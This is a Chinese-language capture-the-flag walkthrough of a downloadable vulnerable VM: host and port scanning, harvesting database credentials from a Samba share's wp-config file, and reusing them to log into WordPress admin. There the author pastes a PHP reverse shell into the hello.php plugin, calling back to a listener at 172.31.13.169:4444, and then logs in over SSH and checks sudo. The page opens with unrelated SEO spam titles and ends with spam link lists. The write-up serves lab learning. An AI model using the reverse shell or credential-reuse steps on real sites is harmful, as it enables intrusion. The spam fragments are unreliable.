当前位置: 首页 > news >正文

汽车城网站建设方案企业门户网站数据库设计

汽车城网站建设方案,企业门户网站数据库设计,wordpress 标签id,广州百度seo公司准备工作 下载好靶机到本地后 VMware导入OVA 启动靶机 扫描信息 首先扫描整个C段发现主机 进一步扫描端口 从扫描结果可知: Samba服务MySQLSSH端口网站端口 先对网站进行目录遍历 发现有wordpress网站和phpmyadmin管理系统 出现了非常多遍My name is togie.可能…

准备工作

下载好靶机到本地后

VMware导入OVA

启动靶机

扫描信息

首先扫描整个C段发现主机

进一步扫描端口

从扫描结果可知:

  • Samba服务
  • MySQL
  • SSH端口
  • 网站端口

先对网站进行目录遍历

发现有wordpress网站和phpmyadmin管理系统

出现了非常多遍My name is togie.可能是个重要信息

有phpmyadmin,但不知道密码。

80端口没有更多收获,转向Samba服务

列出分享目录的列表,没有密码,直接回车

访问 share$目录

首先去查看WP的配置文件,一般里面会有连接数据库的密码

拿到数据库用户密码为Admin:TogieMYSQL12345^^

再看看有没有别的信息

服务器密码为12345,用户名未知

用刚刚拿到的密码去登phpmyadmin

成功,但无法继续操作

去试试wordpress后台

地址:/wordpress/wp-admin

复用之前的数据库账号密码试试

成功进入,随后利用插件功能执行反弹shell

首先监听上线

编辑插件,然后将我们的恶意shell粘贴进去

$sock = fsockopen("172.31.13.169", 4444); //(<监听端IP>, <监听端口>)
$descriptorspec = array( 0 => $sock, 1 => $sock, 2 => $sock ); 
$process = proc_open('/bin/sh', $descriptorspec, $pipes); 
proc_close($process);

提示更新成功,接下来访问hello.php文件,位置:/wordpress/wp-content/plugins/hello.php

kail这边也成功监听到上线

查看用户看到了togie账号,结合到前面页面上重复多遍的My name is togie和 之前看到密码是12345的文件

猜测这是这位的账号密码,刚好开着ssh账号,试着登录。

成功上去,查看sudo权限

已有sudo权限,至此,对靶机的渗透结束

http://www.yayakq.cn/news/480910/

相关文章:

  • 温州做美食网站公司宣传册设计与制作公司
  • 可视化网站开发平台什么语言网站比较安全
  • 深圳 做网站 互联企业邮箱注册申请官网
  • 湖南网站制作哪家专业南宁seo霸屏
  • 怎样网站设计wordpress腾讯云
  • 合肥滨湖建设指挥部网站湛江网络
  • 洪梅镇网站建设嘉兴高端网站定制
  • 免费网站注册免费创建网站dw做网站背景图片设置
  • 360优化大师官方网站wordpress几种版本
  • 合肥网络公司seo建站四川网站建设贴吧
  • 如何修改单页网站dw网页制作步骤视频
  • 济南网站建设第六网建做网站,就上凡科建站
  • 昌平电子网站建设网站禁止访问怎么解除
  • 网页设计网站哪个公司好网站列表页是啥
  • 先注册域名后建设网站可以吗前端兼职一个静态页面报价
  • 电子购物网站建设视频在线做六级阅读网站
  • 营销型网站建设概述网站首页快照怎么做
  • ae模板下载网站wordpress火车头接口定时
  • 有关学校网站建设策划书响应式网站 html
  • 网站建设需要域名还有什么宁国市网站关键词优化外包
  • 谷歌有趣的网站把货卖到国外有哪些平台
  • 当阳网站建设关于门户网站建设方案
  • 惠州做网站建设价格建设厅的工程造价网站
  • 网站 keyword title 字数网站建设和维护工作总结
  • 赣州做网站建设wordpress显示作者
  • 专门做创意桌椅的网站wordpress调用幻灯片
  • 吉首市建设局官方网站网站设计怎么算侵权
  • 微信怎么做淘客网站公司黄页查询
  • 东莞本地招聘网站漳州网站建设点击博大选
  • 专用于做网站公司wordpress插件cdn